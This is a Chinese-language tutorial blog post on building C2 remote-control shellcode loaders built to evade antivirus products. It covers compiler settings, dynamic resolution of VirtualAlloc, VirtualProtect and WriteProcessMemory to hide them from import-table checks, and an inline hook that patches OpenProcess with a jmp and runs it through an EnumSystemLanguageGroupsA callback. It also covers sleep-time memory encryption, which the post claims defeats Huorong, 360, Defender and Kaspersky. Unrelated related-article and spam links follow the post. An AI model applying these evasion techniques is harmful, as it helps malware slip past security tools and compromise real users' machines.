当前位置: 首页 > news >正文

C2远控篇CC++InlineHook挂钩动态API调用突破内存加密导入表检测

#C2远控-ShellCode-认知&环境

1.创建工程时关闭SDL检查

2.属性->C/C++->代码生成->运行库->多线程 (/MT)如果是debug则设置成MTD

3.属性->C/C++->代码生成->禁用安全检查GS

4.关闭生成清单 属性->链接器->清单文件->生成清单 选择否

#C2远控-ShellCode-分析&提取

ShellCode的本质其实就是一段可以自主运行的代码。

它没有任何文件结构,它不依赖任何编译环境,无法像exe一样双击运行,

因此需要通过控制程序流程跳转到shellcode地址加载上去执行shellcode。

目的:杀毒和感知平台如何定性

分析:OD&xdb&ida

提取:010Editor

加载:各种Loader方法执行

流程:ShellCode->Loader->EXE

思路:

1、Shellcode自写打乱-杀毒不认识

2、Shellcode加密混淆-杀毒不知道

3、Shellcode分离隐藏-杀毒找不到

4、Shellcode注入回调-杀毒绕圈圈

内存免杀是将shellcode直接加载进内存,由于没有文件落地,因此可以绕过文件扫描策略的查杀。为了使内存免杀的效果更好,在申请内存时一般采用渐进式申请一块可读写内存,在运行时改为可执行,在执行的时候遵循分离免杀的思想。分离免杀包含对特征和行为的分离两个维度,把shellcode从放在程序转移到加载进内存,把整块的ShellCode通过分块传输的方法上传然后再拼接,这些体现了基本的"分离"思想。

补充:

编辑器设置 VS

https://mp.weixin.qq.com/s/UJlVvagNjmy9E-B-XjBHyw

编译器差异 G++ GCC

https://blog.csdn.net/weixin_41012767/article/details/129365597

突破内存扫描

项目参考:https://github.com/wangfly-me/LoaderFly

➢ C2远控-Loader加载器-动态API

->绕过杀毒对导入表的检测定性

例:动态调用VirtualProtect

typedef BOOL(WINAPI* vp)(

LPVOID      Address,

DWORD       size,

DWORD       New,

PDWORD      Old

);

vp vip = (vp)GetProcAddress(

GetModuleHandleA("Kernel32.dll"),

"VirtualProtect"

);

演示:对回调loader进行某函数动态API加载

typedef LPVOID(WINAPI* VAlloc)(

    LPVOID      lpAddress,

    SIZE_T      dwSize,

    DWORD       flAllocationType,

    DWORD       flProtect

    );

VAlloc VAlloc = (VAlloc)GetProcAddress(

    GetModuleHandleA("Kernel32.dll"),

    "VirtualAlloc"

);

➢ C2远控-Loader加载器-InlineHook

->绕过杀毒对内存扫描检测定性

InlineHook又称为内联Hook,是一种强大而又灵活的Hook技术。

Inline Hook的主要思想就是直接修改目标函数的代码,

通常是在目标函数的开头插入一个跳转指令(jmp)。

这个跳转指令会将程序的执行流跳转到我们自定义的函数中。

实现方式:

X86

// 方式一,使用jmp相对地址跳转

jmp <相对地址>   ; E9 <相对地址>

// 方式二,使用寄存器jmp绝对地址跳转

mov eax, <绝对地址>   ; B8 <绝对地址>

jmp eax             ; FF E0

// 方式三,使用push ret绝对地址跳转

push <绝对地址>   ; 68 <绝对地址>

ret             ; C3

X64

// 方式二,使用寄存器jmp绝对地址跳转

mov r12, <绝对地址>   ; 49 BC <绝对地址>

jmp r12             ; 41 FF E4

// 方式三,使用push ret绝对地址跳转

mov r12, <绝对地址>   ; 49 BC <绝对地址>

push r12             ; 41 54 <绝对地址>

ret                 ; C3

注意事项

1.E9方式替换5个字节,B8方式替换7个字节。

2.原函数的内存保护属性在代码替换后要进行恢复,不然可能导致hook不成功。

3.保证原函数可正常运行,需在hook执行目标函数中执行原函数并返回值进行返回。

4.为了保证下次原函数被调用时继续执行hook,所以在执行完原函数后再次进行替换使得下次原函数被调用时再次进入hook函数。

拓展技术:

API hook大致有以下几种方式:

1、Inline hook,应用层的注入hook,通过在内存中找到想要hook函数地址,并在其之前加入自己构造的跳转指令,当被hook位置执行时,便可以跳转到hook使用者自己编写的执行代码,在其执行完毕后,还原被修改的字节,接着执行正常流程。

2、IAT hook,导入表hook,通过修改导入表中某函数的地址到自己补丁函数来实现。

3、SSDT hook,内核层的hook技术,通过修改系统服务表中某个服务函数的地址到自己的补丁函数来实现。

4、IRP hook,内核层的hook技术,通过修改IRP结构体中某个成员变量指向自己的补丁函数来实现。

例子:

SetHook->MessageBoxA->MyMessageBoxA

➢ C2远控-DF-动态调用&InlineHook&混淆

1动态调用:

typedef BOOL(WINAPI* Write)(

HANDLE      hprocess,

LPVOID      BaseAddr,

LPCVOID     BUffer,

SIZE_T      Size,

SIZE_T* NumberOfBytes

);

Write Writer = (Write)GetProcAddress(

GetModuleHandleA("Kernel32.dll"),

"WriteProcessMemory"

);

typedef BOOL(WINAPI* vp)(

LPVOID      Address,

DWORD       size,

DWORD       New,

PDWORD      Old

);

vp vip = (vp)GetProcAddress(

GetModuleHandleA("Kernel32.dll"),

"VirtualProtect"

);

2InlineHook

->OpenProcess函数进行InlineHook

//这里是获取我们需要hook的api的地址,我们这里是hook OpenProcess这个api

hookFunc = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "OpenProcess");

//这里构建jmp指令

Newbyte[0] = '\xE9';

//这里加1是为了不把jmp给覆盖,然后把偏移地址赋值到NewByte中

*(DWORD*)(Newbyte + 1) = (DWORD)FuncAddr - (DWORD)hookFunc - 5;

//这里就是把定义好的跳转指令写入到我们需要hook的api的前5个字节中

Writer(GetCurrentProcess(), hookFunc, Newbyte, 5, &d);

//这个api作用是利用第一个参数(回调函数)来执行我们修改了前5个字节的api

EnumSystemLanguageGroupsA((LANGUAGEGROUP_ENUMPROCA)hookFunc, LGRPID_INSTALLED, NULL);

➢ C2远控-卡巴-动态调用&InlineHook&沙箱

一种规避杀软检测的技术就是内存加密技术。由于杀软并不是一直扫描内存,而是间隙性的扫描敏感内存,因此可以在cs的shellcode调用sleep休眠将可执行内存区域加密,在休眠结束时再将内存解密来规避杀软内存扫描达到免杀的目的。基于以上原理,结合想法进行了实现,成功实现动态免杀火绒、360、defender、卡巴等

参考:https://mp.weixin.qq.com/s/nD7RLhPpBC9Gqg_c1glNzQ

相关文章:

  • milvus和attu的搭建
  • AIRTBench:测量语言模型中的自主 AI 红队功能
  • Uniapp 中 onShow 与 onLoad 的执行时机解析
  • MacOS X 命令行永久设置网卡IP、MASK、GW、DNS
  • uni-app总结3-项目新建运行调试
  • easyexcel基于模板生成报表
  • kafka消费的模式及消息积压处理方案
  • 【系统分析师】2015年真题:案例分析-答案及详解
  • 【隐马尔可夫模型】隐马尔可夫模型的观测序列概率计算算法及例题详解
  • 【一天一个知识点】RAG系统构建第二步:构建检索器模块(Retriever)
  • 电路笔记(信号):一阶低通RC滤波器 一阶线性微分方程推导 拉普拉斯域表达(传递函数、频率响应)分析
  • 京东三年一革新:宣布进军酒旅行业,携程回应海外市场巨大
  • Seo工具使用与流量数据观察实践(上)
  • Java并发编程实战 Day 28:虚拟线程与Project Loom
  • 【Ambari3.0.0 部署】Step1—基础环境准备-适用于el8
  • YOLO v5详解(文字版)
  • 解决Matplotlib三维图无法旋转的问题
  • 全排列问题一文详解
  • 几种大功率远距传输WiFI解决方案
  • 1、使用STM32CubeMX在项目中添加FreeRTOS源码
  • 做装修的网站有哪些内容/nba常规赛
  • 网站销售的优势/湘潭高新区最新新闻
  • 自己做网站商城需要营业执照吗/安卓神级系统优化工具
  • 通辽市 做网站/企业高管培训课程有哪些
  • 免费做app和网站的平台有哪些/西安seo和网络推广
  • 做亚马逊网站的公司建议/哪里可以免费推广广告